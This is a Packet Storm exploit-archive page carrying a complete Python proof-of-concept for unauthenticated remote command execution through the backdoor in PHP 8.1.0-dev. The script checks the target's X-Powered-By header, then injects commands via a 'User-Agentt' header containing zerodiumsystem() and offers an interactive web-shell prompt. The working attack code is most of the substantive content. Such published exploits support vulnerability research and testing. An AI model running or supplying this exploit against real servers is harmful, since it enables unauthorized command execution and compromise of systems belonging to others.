exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP 8.1.0-dev Backdoor Remote Command Execution

PHP 8.1.0-dev Backdoor Remote Command Execution
Posted May 31, 2021
Authored by Mayank Deshmukh

PHP version 8.1.0-dev unauthenticated remote command execution proof of concept exploit that leverages the backdoor.

tags | exploit, remote, php, proof of concept
SHA-256 | f726aea9ab9a0663c00691675009247212802a4e2f78a7fb5cea2c34dc366e86

PHP 8.1.0-dev Backdoor Remote Command Execution

Change Mirror Download
#!/usr/bin/env python3

# Exploit Title: PHP 8.1.0-dev WebShell RCE (Unauthenticated)
# Date: 2021-05-31
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.php.net/
# Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
# Version: PHP 8.1.0-dev
# Tested on: Kali GNU/Linux 2020.3
# Author website: https://coldfusionx.github.io
# Author email: coldfusionx@outlook.com
# Detailed POC: https://github.com/ColdFusionX/PHP-8.1.0-dev_WebShell-RCE

import argparse, textwrap
import requests
import sys


parser = argparse.ArgumentParser(description="PHP 8.1.0-dev WebShell RCE by ColdFusionX", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami
'''))

parser.add_argument("-l","--url", help="PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)")
args = parser.parse_args()

if len(sys.argv) <= 2:
print (f"Exploit Usage: ./exploit.py -h [help] -l [url]")
sys.exit()

# Variables
Host = args.url

r = requests.session()

## Use this for Proxy
#r.proxies.update( { 'http':'http://127.0.0.1:8080' } )

def svcheck():
verify = r.get(f'{Host}')

if (verify.headers['X-Powered-By'] == 'PHP/8.1.0-dev') :
print("Target is running on PHP 8.1.0-dev\n")
return True

def exec():
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
'User-Agentt' : f'zerodiumsystem("{Command}");'
}

door = r.get(f'{Host}', headers = headerscontent, allow_redirects= False)

resp = door.text.split("<!DOCTYPE html>")[0]
if (resp == ""):
print()
print("Invalid Command")
print()
else:
print()
print(resp)


if __name__ == "__main__":

print ('\n[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX \n ')
try:
if svcheck() == True:
print("*Shoot your commands below* \n")
try:
while True:
Command = input("[^] WebShell=- ")
exec()
except:
print("\r\nExiting.")
sys.exit(-1)

except Exception as ex:
print('Invalid URL or Target not Vulnerable')

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close